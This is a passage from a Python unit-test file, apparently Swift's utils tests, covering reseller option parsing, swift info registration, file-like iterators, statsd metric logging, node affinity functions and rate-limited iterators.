set(options['PRE1_'].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['PRE1_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_first_blank(self):
conf = {'reseller_prefix': " '' , PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_with_blank_comma(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_stray_comma(self):
conf = {'reseller_prefix': "AUTH ,, PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_multiple_stray_commas_resellers(self):
conf = {'reseller_prefix': ' , , ,'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_unprefixed_options(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"operator_roles": 'role1, role2',
"service_roles": 'role3, role4',
'require_group': 'auth_blank_group',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['AUTH_'].get('service_roles')))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('auth_blank_group',
options['AUTH_'].get('require_group'))
self.assertEqual('auth_blank_group', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
class TestSwiftInfo(unittest.TestCase):
def tearDown(self):
utils._swift_info = {}
utils._swift_admin_info = {}
def test_register_swift_info(self):
utils.register_swift_info(foo='bar')
utils.register_swift_info(lorem='ipsum')
utils.register_swift_info('cap1', cap1_foo='cap1_bar')
utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
self.assertTrue('swift' in utils._swift_info)
self.assertTrue('foo' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('lorem' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum')
self.assertTrue('cap1' in utils._swift_info)
self.assertTrue('cap1_foo' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
self.assertTrue('cap1_lorem' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum')
self.assertRaises(ValueError,
utils.register_swift_info, 'admin', foo='bar')
self.assertRaises(ValueError,
utils.register_swift_info, 'disallowed_sections',
disallowed_sections=None)
utils.register_swift_info('goodkey', foo='5.6')
self.assertRaises(ValueError,
utils.register_swift_info, 'bad.key', foo='5.6')
data = {'bad.key': '5.6'}
self.assertRaises(ValueError,
utils.register_swift_info, 'goodkey', **data)
def test_get_swift_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info()
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_register_swift_admin_info(self):
utils.register_swift_info(admin=True, admin_foo='admin_bar')
utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
self.assertTrue('swift' in utils._swift_admin_info)
self.assertTrue('admin_foo' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_foo'], 'admin_bar')
self.assertTrue('admin_lorem' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum')
self.assertTrue('cap1' in utils._swift_admin_info)
self.assertTrue('ac1_foo' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('ac1_lorem' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum')
self.assertTrue('swift' not in utils._swift_info)
self.assertTrue('cap1' not in utils._swift_info)
def test_get_swift_admin_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(admin=True)
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_admin_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('disallowed_sections' in info['admin'])
self.assertTrue('cap1' in info['admin']['disallowed_sections'])
self.assertTrue('cap2' not in info['admin']['disallowed_sections'])
self.assertTrue('cap3' in info['admin']['disallowed_sections'])
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_get_swift_admin_info_with_disallowed_sub_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap2_foo': 'cap2_bar'},
'cap4': {'a': {'b': {'c': 'c'},
'b.c': 'b.c'}}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3',
'cap4.a.b.c'])
self.assertTrue('cap3' not in info)
self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa')
self.assertTrue('cap1_foo' not in info['cap1'])
self.assertTrue('c' not in info['cap4']['a']['b'])
self.assertEqual(info['cap4']['a']['b.c'], 'b.c')
def test_get_swift_info_with_unmatched_disallowed_sections(self):
cap1 = {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'}
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': cap1}
# expect no exceptions
info = utils.get_swift_info(
disallowed_sections=['cap2.cap1_foo', 'cap1.no_match',
'cap1.cap1_foo.no_match.no_match'])
self.assertEqual(info['cap1'], cap1)
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_next(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = next(iter_file)
except StopIteration:
break
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_read(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEqual(iter_file.read(), ''.join(in_iter))
def test_read_with_size(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEqual(''.join(chunks), ''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEqual(utils.FileLikeIter('abc').read(0), '')
def test_readline(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readline2(self):
self.assertEqual(
utils.FileLikeIter(['abc', 'def\n']).readline(4),
'abcd')
def test_readline3(self):
self.assertEqual(
utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline(),
('a' * 1111) + 'bc\n')
def test_readline_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEqual(
lines,
['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n', 'k\n',
'tr', 'ai', 'li', 'ng', '.'])
def test_readlines(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEqual(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readlines_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEqual(
lists_of_lines,
[['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']])
def test_close(self):
iter_file = utils.FileLikeIter('abcdef')
self.assertEqual(next(iter_file), 'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertEqual(None, logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assertTrue(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_no_exception_when_cant_send_udp_packet(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket(sendto_errno=errno.EPERM)
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
expected = ["Error sending UDP message to ('some.host.com', 8125): "
"[Errno 1] test errno 1"]
self.assertEqual(fl.get_lines_for_level('warning'), expected)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(412)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(416)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing')
self.assertTrue(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
self.concurrent_call = False
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
self.concurrent_call = True
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assertTrue(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestRateLimitedIterator(unittest.TestCase):
def run_under_pseudo_time(
self, func, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('eventlet.sleep', my_sleep):
return func(*args, **kwargs)
def test_rate_limiting(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(range(9999), 100)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 11, not 10, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 11)
def test_limit_after(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100, limit_after=5)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 16, not 15, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 16)
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in range(2):
pile.spawn(self.increment, iterable)
sorted([resp for resp in pile])
self.assertTrue(
iterable.concurrent_call, 'test setup is insufficiently crazy')
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
unsafe_iterable = UnsafeXrange(10)
iterable = utils.GreenthreadSafeIterator(unsafe_iterable)
for _ in range(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEqual(list(range(1, 11)), response)
self.assertTrue(
not unsafe_iterable.concurrent_call, 'concurrent call occurred')
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and 'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertTrue(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertEqual(None, logger.update_stats('foo', 88))
self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
self.assertEqual(None, logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertEqual(None, logger.increment('foo'))
self.assertEqual(None, logger.increment('foo', 0.57))
self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
self.assertEqual(None, logger.decrement('foo'))
self.assertEqual(None, logger.decrement('foo', 0.57))
self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
self.assertEqual(None, logger.timing('foo', 88.048))
self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
self.assertEqual(None, logger.timing_since('foo', 8938))
self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
self.assertEqual(None, logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
